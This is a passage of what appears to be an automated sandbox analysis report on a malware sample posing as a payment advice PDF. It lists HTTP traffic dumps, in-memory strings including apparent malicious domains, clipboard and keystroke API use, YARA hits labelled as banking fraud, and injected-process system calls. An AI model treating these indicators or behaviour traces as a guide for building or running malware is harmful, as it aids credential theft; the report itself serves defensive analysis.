72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 05 Dec 2024 18:41:39 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 
72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 05 Dec 2024 18:42:00 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 
00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 05 Dec 2024 18:42:03 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 
00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
                Source: rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
                Source: lDBisuvfBkK.exe, 0000000D.00000002.3096255257.00000000050D9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.callyur.shop
                Source: lDBisuvfBkK.exe, 0000000D.00000002.3096255257.00000000050D9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.callyur.shop/hayl/
                Source: rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Oo0c
Source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: rasautou.exe, 0000000B.00000003.1637362458.0000000007A21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://lolipop.jp/
Source: rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
Source: rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://pepabo.com/
Source: rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://static.minne.com/files/banner/minne_600x500
Source: rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
Source: rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: rasautou.exe, 0000000B.00000002.3095003763.00000000054C6000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003176000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.grandesofertas.fun/5rfk/?wVb0=sD5zUlt3wbrvSr53X/LgfhW
Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008B4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_008B4164
Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008B3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 0_2_008B3F66
Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008A001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState | 0_2_008A001C
Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008CCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 0_2_008CCABC

E-Banking Fraud

Source: Yara match | File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.3093757528.00000000041C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1448964274.0000000006B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1445662194.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3091105288.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.3096255257.0000000005030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1446968619.0000000004FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3093726218.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3093625342.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: This is a third-party compiled AutoIt script. | 0_2_00843B3A
Source: rPaymentAdviceNote_pdf.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: rPaymentAdviceNote_pdf.exe, 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_0e7842ef-6
Source: rPaymentAdviceNote_pdf.exe, 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` | memstr_860ec63e-0
Source: rPaymentAdviceNote_pdf.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_c36bc19a-f
Source: rPaymentAdviceNote_pdf.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` | memstr_4adb8e55-5
Source: initial sample | Static PE information: Filename: rPaymentAdviceNote_pdf.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0042CDE3 NtClose,8_2_0042CDE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872B60 NtClose,LdrInitializeThunk,8_2_03872B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03872DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03872C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038735C0 NtCreateMutant,LdrInitializeThunk,8_2_038735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03874340 NtSetContextThread,8_2_03874340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03874650 NtSuspendThread,8_2_03874650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872B80 NtQueryInformationFile,8_2_03872B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872BA0 NtEnumerateValueKey,8_2_03872BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872BE0 NtQueryValueKey,8_2_03872BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872BF0 NtAllocateVirtualMemory,8_2_03872BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872AB0 NtWaitForSingleObject,8_2_03872AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872AD0 NtReadFile,8_2_03872AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872AF0 NtWriteFile,8_2_03872AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872F90 NtProtectVirtualMemory,8_2_03872F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872FA0 NtQuerySection,8_2_03872FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872FB0 NtResumeThread,8_2_03872FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872FE0 NtCreateFile,8_2_03872FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872F30 NtCreateSection,8_2_03872F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872F60 NtCreateProcessEx,8_2_03872F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872E80 NtReadVirtualMemory,8_2_03872E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872EA0 NtAdjustPrivilegesToken,8_2_03872EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872EE0 NtQueueApcThread,8_2_03872EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872E30 NtWriteVirtualMemory,8_2_03872E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872DB0 NtEnumerateKey,8_2_03872DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872DD0 NtDelayExecution,8_2_03872DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872D00 NtSetInformationFile,8_2_03872D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872D10 NtMapViewOfSection,8_2_03872D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872D30 NtUnmapViewOfSection,8_2_03872D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872CA0 NtQueryInformationToken,8_2_03872CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872CC0 NtQueryVirtualMemory,8_2_03872CC0
